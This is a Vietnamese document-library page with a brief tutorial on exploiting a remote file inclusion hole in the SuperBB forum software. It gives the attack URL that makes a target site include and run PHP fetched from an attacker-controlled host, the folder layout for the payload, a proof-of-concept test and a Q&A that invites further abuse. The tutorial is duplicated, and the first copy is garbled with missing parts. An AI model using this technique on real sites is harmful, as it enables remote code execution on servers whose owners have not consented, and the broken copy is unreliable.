TAILIEUCHUNG - Khai thác lỗi bảo mật forum SuperBB

Khai thác lỗi bảo mật forum SuperBB : Tạo trên host http://[attacker]/lang/1/ Chạy trên trình duyệt http://[target]/include/[attacker]&lang_cod e=1 Cách test: 1. Đăng ký một host ko support PHP. 2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1, trong folder 1 tạo một file tên là với nội dung như sau: CODE Chạy trên trình duyệt http://[target]/include/[attacker]&lang_cod e=1 Nếu thấy có dòng chữ "Hello world" thì OK, site đang test bị lỗi này Câu hỏi: 1. SupperBB vuln là gì? 2. Làm sao đăng kí host trên server đó được ( nếu. | Khai thác lỗi bảo mật forum SuperBB Tạo trên host http attacker lang 1 Chạy trên trình duyệt http target include script_path http attacker lang_cod e 1 Cách test 1. Đăng ký một host ko support PHP. 2. Tạo trên host đó một folder named lang trong folder lang tạo folder named 1 trong folder 1 tạo một file tên là với nội dung như sau CODE echo Hello world Chạy trên trình duyệt http target include script_path http attacker lang_cod e 1 Nếu thấy có dòng chữ Hello world thì OK site đang test bị lỗi này Câu hỏi 1. SupperBB vuln là gì 2. Làm sao đăng kí host trên server đó được nếu họ ko cho 3. Host ko support php thì làm sao hiển thị cái file được 4. Tại sao lại phải tạo folder lang rồi tạo folder name 1 rồi tạo file mục đích là để làm gì 5. Site đang test bị lỗi này thì mình làm được gì với lỗi đó Trả lời 1. Là lỗi bảo mật của forum SuperBB 2. Không cần đăng ký host trên server đó đăng ký host ở đâu cũng được nhưng ko được support PHP 3. Được vì cái file ko phải được run trên host của mình mà được inject vào code trên host của victim 4. Bởi vì script forum nó include đến file ở trong cấu trúc thư mục như thế 5. Làm được gì là tuỳ vào kinh nghiệm mỗi .

TỪ KHÓA LIÊN QUAN
TÀI LIỆU MỚI ĐĂNG
13    158    1    24-12-2024
TAILIEUCHUNG - Chia sẻ tài liệu không giới hạn
Địa chỉ : 444 Hoang Hoa Tham, Hanoi, Viet Nam
Website : tailieuchung.com
Email : tailieuchung20@gmail.com
Tailieuchung.com là thư viện tài liệu trực tuyến, nơi chia sẽ trao đổi hàng triệu tài liệu như luận văn đồ án, sách, giáo trình, đề thi.
Chúng tôi không chịu trách nhiệm liên quan đến các vấn đề bản quyền nội dung tài liệu được thành viên tự nguyện đăng tải lên, nếu phát hiện thấy tài liệu xấu hoặc tài liệu có bản quyền xin hãy email cho chúng tôi.
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.